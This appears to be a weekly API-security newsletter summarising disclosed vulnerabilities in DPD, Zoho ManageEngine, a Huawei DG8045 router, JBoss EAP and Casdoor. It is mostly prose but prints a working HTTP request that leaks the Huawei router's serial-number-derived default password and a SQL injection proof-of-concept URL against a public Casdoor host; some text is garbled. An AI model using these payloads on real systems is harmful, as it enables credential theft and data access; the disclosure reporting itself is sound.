API exploits: the week of January 31st. Huawei, Zoho, and DPD API auth bypass.

DPD package sniffing by API

First of all, this is a great example of the vulnerability disclosure efforts from the largest parcel delivery network in Europe. Appreciate the DPD security team's response!

The full story is available here: https://www.pentestpartners.com/security-blog/dpd-package-sniffing/

In a few words, if you know the parcel code, you can get the recipient postal code by the REST API call. Once you know the code and postal code, you can call another API endpoint to get all the details about that delivery, including the private data of the recipient. And some photos of the package and the receiver well:

Zoho ManageEngine ServiceDesk Plus versions 11.3 before 11302, 11.2 before 11208, 11.1 before 11145, and 11.0 before 11012 are vulnerable to an authentication bypass that allows a few REST-API URLs without authentication. The risk of this issue is critical.

We can also find which API endpoints were vulnerable by checking Zoho release notes:

Source: https://www.tenable.com/plugins/nessus/157383

Huawei DG8045 credential disclosure by API auth bypass

Huawei router DG8045 and some other undisclosed models allow retrieving device information by REST API call not protected by any authentication. As a result, the remote attackers can get the default router password which is equal to the last 8 characters of the device serial number.

This exploit is as simple as one API call:

GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Thu, 24 Jun 2021 02:07 GMT+2
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascrp
Content-Length: 141

while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/e        

https://vulners.com/zdt/1337DAY-ID-37300

Source: Zoho ManageEngine ServiceDesk Plus versions 11.3 before 11302, 11.2 before 11208, 11.1 before 11145 and 11.0 before 11012 are vulnerable to authentication bypass that allows a few REST-API URLs without authentication.

RedHat JBoss EAP 7. Remote Code Execution by deserialization. Incomplete fix of CVE-2016-4978 in HornetQ library. CVE-2021-20318

Some fixes require some time. Some of them require months. Sometimes, fixes require even more, like ?? 5-6 years, as it happened with JBoss EAP.

JMS ObjectMessage is a serialization data object that was fixed incompletely and still allowed to execute an arbitrary Java code for all these 6 years and the firs fix.

Source: https://access.redhat.com/security/cve/cve-2021-20318

Casdoor get-organizations API endpoint SQL injection

No, SQL injections are not dead at all. They survived through the last 34 years (if we will count from the first published exploit in Phrack in 1998) and kills APIs.

Casdoor is a popular Open Source centralized authentication system.

This vulnerability was found by Go source code analysis.

The query API provides the?field?and?value?parameters to support query by field

It inserts the user's input into the raw SQL expression which can lead to a SQL injection vulnerability.

session = session.And(fmt.Sprintf("%s like ?", util.SnakeString(field)), fmt.Sprintf("%%%s%%", value))

And the?/api/get-organizations?is a public route that everyone can visit.

Proof of concept:

https://door.casbin.com/api/get-organizations?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))%20%20and%20name.        

Kudos Wuhan005 from China